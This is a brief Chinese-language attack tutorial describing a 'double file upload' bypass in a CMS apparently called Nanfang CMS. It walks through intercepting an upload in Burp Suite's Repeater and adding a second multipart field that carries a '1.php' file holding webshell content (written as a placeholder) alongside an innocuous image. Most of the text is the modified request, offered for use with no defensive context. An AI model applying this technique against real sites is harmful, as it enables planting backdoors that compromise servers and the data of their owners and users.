双文件上传突破利用

这个漏洞在南方cms 上出现的

主要是上传时候利用bp抓包

然后鼠标右键吧数据包发送到Repeater模块

找到你上传的包内容 一般是

------61234564788

Content-Disposition: form-data; name="FileName"; filename=“1.png”

图片内容

------61234564788--

改成

------61234564788

Content-Disposition: form-data; name="FileName"; filename=“1.png”

图片内容

------61234564788

Content-Disposition: form-data; name="FileName1"; filename=“1.php”

马内容

------61234564788--